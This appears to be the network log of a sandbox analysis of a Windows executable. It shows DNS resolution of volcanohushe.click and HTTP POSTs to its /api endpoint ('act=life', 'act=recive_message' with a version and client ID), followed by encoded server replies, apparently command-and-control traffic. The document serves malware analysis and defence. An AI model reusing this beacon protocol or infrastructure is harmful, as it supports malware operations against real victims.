                                                                                Dec 27, 2024 08:15:04.895436049 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.162899017 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.163000107 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.165913105 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.165929079 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.166245937 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.210073948 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.211788893 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.211810112 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.211947918 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.908413887 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.908526897 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.908629894 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.910610914 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.910625935 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.919159889 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.919204950 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:06.919270992 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.919518948 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:06.919528961 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:08.351775885 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:08.351844072 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:08.356193066 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:08.356211901 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:08.356566906 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:08.358824015 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:08.358949900 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:08.360304117 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.131970882 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.132024050 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.132080078 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.132095098 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.132117033 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.132144928 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.138689041 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.138776064 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.138802052 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.159404993 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.159517050 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.159538984 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.190167904 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.190263033 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.190285921 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.241365910 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.251445055 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.303818941 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.332864046 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.337515116 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.337551117 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.337631941 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.337646008 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.337698936 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.337932110 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.337950945 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.337975025 CET49708443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.337980986 CET44349708104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.546960115 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.546991110 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:09.547060013 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.547425985 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:09.547446012 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:10.869559050 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:10.869659901 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:10.870923996 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:10.870938063 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:10.871181965 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:10.872395992 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:10.872560978 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:10.872589111 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:12.568327904 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:12.568428993 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:12.568515062 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:12.568711042 CET49719443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:12.568732977 CET44349719104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:12.657908916 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:12.658008099 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:12.658119917 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:12.658474922 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:12.658510923 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:13.916021109 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:13.916099072 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:13.917274952 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:13.917293072 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:13.917567968 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:13.918742895 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:13.918879986 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:13.918910027 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:13.918984890 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:13.959383011 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:15.109813929 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:15.109913111 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:15.110071898 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:15.110188961 CET49725443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:15.110232115 CET44349725104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:15.317234993 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:15.317296982 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:15.317368031 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:15.317856073 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:15.317867994 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:16.622030020 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:16.622137070 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:16.629961014 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:16.629997015 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:16.630201101 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:16.631650925 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:16.631778955 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:16.631819010 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:16.631902933 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:16.631912947 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:18.188595057 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:18.188690901 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:18.188747883 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:18.188880920 CET49731443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:18.188910007 CET44349731104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:18.599653959 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:18.599689960 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:18.599757910 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:18.600128889 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:18.600147963 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:19.857243061 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:19.857325077 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:19.858635902 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:19.858659029 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:19.858944893 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:19.860222101 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:19.860352039 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:19.860357046 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:20.959430933 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:20.959547043 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:20.959695101 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:20.959875107 CET49742443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:20.959903955 CET44349742104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:21.532475948 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:21.532524109 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:21.532597065 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:21.532932043 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:21.532943964 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.743887901 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.743963957 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.746526003 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.746540070 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.746757984 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.748864889 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.749504089 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.749535084 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.749634027 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.749669075 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.749763966 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.749780893 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.749902964 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.749932051 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.750061989 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.750094891 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.750611067 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.750638962 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.750647068 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.750827074 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.750859022 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.795330048 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.796405077 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.796459913 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.796479940 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.839329958 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.839803934 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.839858055 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.839888096 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.887334108 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:22.887470007 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:22.931330919 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:23.222964048 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:25.172002077 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:25.172086954 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:25.176258087 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:25.223342896 CET49750443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:25.223364115 CET44349750104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:25.362607002 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:25.362638950 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:25.362724066 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:25.362966061 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:25.362988949 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:26.672748089 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:26.672861099 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:26.674269915 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:26.674287081 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:26.675586939 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:26.722944975 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:26.722944975 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:26.723059893 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536155939 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536218882 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536254883 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536282063 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536313057 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536341906 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536345959 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.536366940 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.536396980 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.536406994 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.544545889 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.544672966 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.544677973 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.561438084 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.561552048 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.561559916 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.565411091 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.565498114 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.565515995 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.565563917 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.565687895 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.565704107 CET44349758104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:27.565726995 CET49758443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:27.565732002 CET44349758104.21.71.155192.168.2.9
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 27, 2024 08:15:04.525485992 CET5568753192.168.2.91.1.1.1
                                                                                Dec 27, 2024 08:15:04.881269932 CET53556871.1.1.1192.168.2.9
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 27, 2024 08:15:04.525485992 CET192.168.2.91.1.1.10x3151Standard query (0)volcanohushe.clickA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 27, 2024 08:15:04.881269932 CET1.1.1.1192.168.2.90x3151No error (0)volcanohushe.click104.21.71.155A (IP address)IN (0x0001)false
                                                                                Dec 27, 2024 08:15:04.881269932 CET1.1.1.1192.168.2.90x3151No error (0)volcanohushe.click172.67.145.201A (IP address)IN (0x0001)false
                                                                                • volcanohushe.click
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.949707104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:06 UTC265OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 8
                                                                                Host: volcanohushe.click
                                                                                2024-12-27 07:15:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                Data Ascii: act=life
                                                                                2024-12-27 07:15:06 UTC1125INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=anktp3kobmf0g6dei9a253c31n; expires=Tue, 22 Apr 2025 01:01:45 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GsC%2BNMGWKmYlNPnXWYRNZgaSlneVIWXqsQTWXXmRUNmzc4p943noqa21pc45lqHNvwg73bg4lcEdQKIhygeUHaloSBjjKb7xBTio%2F6HXqQQImqfAUWVjnUWEEEqSwmXqhYXaOY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f87847d2d8f4376-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1589&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=909&delivery_rate=1777236&cwnd=248&unsent_bytes=0&cid=8dce21b1d1153085&ts=760&x=0"
                                                                                2024-12-27 07:15:06 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                Data Ascii: 2ok
                                                                                2024-12-27 07:15:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.949708104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:08 UTC266OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 50
                                                                                Host: volcanohushe.click
                                                                                2024-12-27 07:15:08 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 63 33 52 6c 64 33 64 7a 26 6a 3d
                                                                                Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--c3Rld3dz&j=
                                                                                2024-12-27 07:15:09 UTC1127INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=ueq3pc7omh5u7473kouhvk93r2; expires=Tue, 22 Apr 2025 01:01:47 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgJd3Q5sibTfH4Fh0Qxc6VruGb%2F4e4Vc1eqJgAXKgJ%2FrpFR80errbyNv4JUkHsc3pHt46QA%2BaZvoHsPwlP162rVefV191GwzgKgi5BV8kwKxlf7EfUwKt9E348Rnc65nq5PuPKs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f87848afb09c459-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1605&rtt_var=680&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=952&delivery_rate=1521625&cwnd=231&unsent_bytes=0&cid=f80d578461968c59&ts=786&x=0"
                                                                                2024-12-27 07:15:09 UTC242INData Raw: 34 39 31 63 0d 0a 53 77 78 2b 5a 4b 6c 78 73 63 4e 4b 62 79 74 61 6a 4b 69 31 74 55 2f 36 54 33 37 4e 66 6c 65 66 6a 72 55 6f 62 63 71 2b 79 66 41 77 4c 67 68 47 6b 30 57 64 34 54 6b 4b 43 57 44 34 32 73 44 51 59 39 67 75 47 75 39 45 4d 66 37 69 78 6b 31 42 36 4d 69 6b 30 6e 46 71 48 77 6a 61 46 4a 33 68 4c 78 63 4a 59 4e 66 54 6c 39 41 68 32 48 56 63 71 42 51 31 2f 75 4c 58 53 51 61 6c 7a 71 57 54 49 32 41 5a 44 4d 77 53 31 61 49 6d 41 6b 34 2f 36 63 6e 66 32 79 61 58 4a 78 50 76 55 6e 58 36 39 4a 63 53 54 34 66 62 76 5a 45 47 62 51 30 50 69 77 79 64 75 47 67 4b 52 58 69 32 69 74 54 51 4c 5a 59 70 47 71 59 57 50 2f 66 71 31 6b 77 48 75 74 65 76 6d 43 4e 75 47 67 33 47 47 38 47 76 4c 41 56 46 4f 65 50 4a 6c 35 6c 74
                                                                                Data Ascii: 491cSwx+ZKlxscNKbytajKi1tU/6T37NflefjrUobcq+yfAwLghGk0Wd4TkKCWD42sDQY9guGu9EMf7ixk1B6Mik0nFqHwjaFJ3hLxcJYNfTl9Ah2HVcqBQ1/uLXSQalzqWTI2AZDMwS1aImAk4/6cnf2yaXJxPvUnX69JcST4fbvZEGbQ0PiwyduGgKRXi2itTQLZYpGqYWP/fq1kwHutevmCNuGg3GG8GvLAVFOePJl5lt
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 6e 7a 56 63 39 31 78 6d 7a 2b 2f 47 57 78 71 6c 7a 4b 33 53 4e 69 41 46 52 73 77 66 6b 2f 6c 6f 42 55 55 32 36 38 6e 59 30 43 79 59 50 78 4f 76 48 7a 33 31 36 4e 31 46 41 4b 66 53 6f 5a 55 68 5a 78 73 4a 7a 42 76 56 72 69 74 4e 42 33 6a 70 30 70 65 50 62 62 67 39 48 36 77 49 4f 4f 79 73 79 41 51 57 36 4e 75 6e 30 6e 45 75 47 67 6a 4b 48 74 4f 7a 49 41 5a 43 50 66 7a 42 33 74 6f 67 6d 43 41 57 6f 42 38 31 2b 75 62 64 52 51 57 73 30 61 61 55 4b 57 35 63 53 49 73 55 79 2b 46 77 54 57 6f 39 2f 73 33 62 77 57 2b 69 62 51 50 68 42 58 58 36 34 4a 63 53 54 36 44 5a 71 4a 45 69 59 52 38 4f 77 41 48 54 73 79 34 41 54 43 72 6f 7a 39 6e 64 4c 6f 6f 6e 45 71 6b 66 50 50 62 6c 30 6b 30 4c 36 4a 4c 72 6c 54 45 75 52 45 62 71 48 74 69 74 49 68 70 4a 65 50 47 45 7a 70 63
                                                                                Data Ascii: nzVc91xmz+/GWxqlzK3SNiAFRswfk/loBUU268nY0CyYPxOvHz316N1FAKfSoZUhZxsJzBvVritNB3jp0pePbbg9H6wIOOysyAQW6Nun0nEuGgjKHtOzIAZCPfzB3togmCAWoB81+ubdRQWs0aaUKW5cSIsUy+FwTWo9/s3bwW+ibQPhBXX64JcST6DZqJEiYR8OwAHTsy4ATCroz9ndLoonEqkfPPbl0k0L6JLrlTEuREbqHtitIhpJePGEzpc
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 71 6b 54 4f 50 47 73 6d 51 6f 49 73 4a 7a 7a 30 67 4e 74 43 41 58 42 55 65 61 69 4a 67 4e 4f 4c 71 37 56 6d 63 35 74 6e 79 46 63 39 31 77 34 2f 4f 54 52 57 41 43 6c 33 36 57 63 4a 6d 73 54 44 73 73 54 33 71 51 73 42 6b 49 37 34 38 37 46 33 53 32 51 4b 42 32 6c 46 6e 57 7a 72 4e 42 53 54 2f 43 63 6d 6f 55 69 4c 43 6b 46 78 52 33 55 74 32 67 53 42 79 47 75 7a 64 75 58 64 64 67 67 46 4b 6f 5a 4f 76 7a 6d 32 55 38 46 70 4e 53 6c 6b 54 74 68 47 41 62 48 47 39 6d 73 4a 67 6c 42 4d 65 58 42 30 64 63 73 6b 6d 31 53 37 78 73 74 76 62 53 58 66 67 69 6b 30 61 54 51 48 47 30 53 43 4d 77 46 6b 37 35 6d 46 41 6b 2f 34 6f 71 50 6c 79 47 52 4c 52 65 6c 47 44 58 36 34 64 4a 4a 43 4b 76 52 72 4a 67 6e 61 52 67 4b 77 68 37 56 6f 53 38 4a 54 43 72 72 77 39 76 62 62 64 5a 74
